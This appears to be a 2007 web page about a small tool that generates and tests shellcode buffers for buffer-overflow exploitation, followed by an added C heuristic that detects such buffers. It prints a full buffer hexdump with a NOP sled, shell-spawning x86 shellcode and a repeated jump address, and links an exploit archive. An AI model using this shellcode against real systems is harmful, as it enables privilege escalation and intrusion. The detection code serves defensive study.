Shellcode Tool

Last updated on 2007-04-12

Inspired by an article in the German [Hakin9](http://www.hakin9.org/en/) magazine from October 2005, I wrote a little program to test and generate shellcode. A good place to learn about buffer overflows is [here](http://community.corest.com/~juliano/).
I found an interesting Python framework called [InlineEgg](http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html) for generating shellcode. It makes shellcode development really easy and effective.

My simple tool is used to prepare buffers with shellcode. The actual asm code is assembled with [nasm](nasm.sourceforge.net) and linked against a gcc main program. The program has three modes: *dump, exec* and *gen*.

**Dump** does a hexdump of the plain shellcode, which is useful when tracing null bytes.

To test the functionality of the shellcode you can use **exec**, which simply calls the shellcode like a function.

**Gen** is used to build a buffer containing the actual shellcode. The code is hexdumped to stdout, the raw code is written to stderr, and the environment variable **$CODE** is set.
The target buffer size and the stack jump address have to be passed to the program. The buffer is first filled with the jump address, then its first half is overwritten with NOPs, and the shellcode is copied to the middle of the buffer.


```
./mkbuffer gen 256  0x1234567
Start: 0x0x8048bb0
End:   0x0x8048bd9
Len:   0x29 (41 bytes)
jump:  0x1234567
90
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
setup env $CODE
```
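
The layout described above (NOP run, code in the middle, jump address repeated to the end) is also what an input filter or a forensic triage step can look for. The following C functions are an added example, not part of the original tool or its download: they measure the leading NOP run, count null bytes as one would with the dump mode, and measure the repeated 4-byte tail. The names, the thresholds and the constructed sample buffer (0xCC stands in for the code) are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Scan result; struct and function names are hypothetical, not from mkbuffer. */
struct scan {
    size_t sled; /* leading run of 0x90 (x86 NOP) bytes */
    size_t nuls; /* 0x00 bytes, which would cut short a C string copy */
    size_t tail; /* trailing bytes that repeat with a period of 4 */
};

struct scan scan_buffer(const unsigned char *buf, size_t len)
{
    struct scan r = {0, 0, 0};
    size_t i;
    while (r.sled < len && buf[r.sled] == 0x90)
        r.sled++;
    for (i = 0; i < len; i++)
        r.nuls += (buf[i] == 0x00);
    /* Walk back from the end while each byte equals the one 4 before it. */
    for (i = len; i > 4 && buf[i - 1] == buf[i - 5]; i--)
        r.tail++;
    if (r.tail) r.tail += 4; /* include the first copy of the repeated word */
    return r;
}

/* Heuristic: long sled, then data, then a long repeated word (thresholds assumed). */
int looks_like_overflow_buffer(const unsigned char *buf, size_t len)
{
    struct scan r = scan_buffer(buf, len);
    return r.sled >= 32 && r.tail >= 32 && r.sled + r.tail < len;
}

/* Constructed sample with the layout shown above; 0xCC stands in for the code. */
void make_sample(unsigned char out[256])
{
    static const unsigned char word[4] = {0x67, 0x45, 0x23, 0x01};
    for (size_t i = 0; i < 256; i++)
        out[i] = word[i % 4];
    memset(out, 0x90, 127);
    memset(out + 127, 0xCC, 41);
}

int main(void)
{
    unsigned char buf[256];
    make_sample(buf);
    printf("suspicious=%d\n", looks_like_overflow_buffer(buf, sizeof buf));
    return 0;
}
```

A buffer made only of NOPs or only of one repeated word is not flagged, because the heuristic requires other data between the sled and the tail.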



[Download](http://optixx.org/download/exploit.tar.gz)
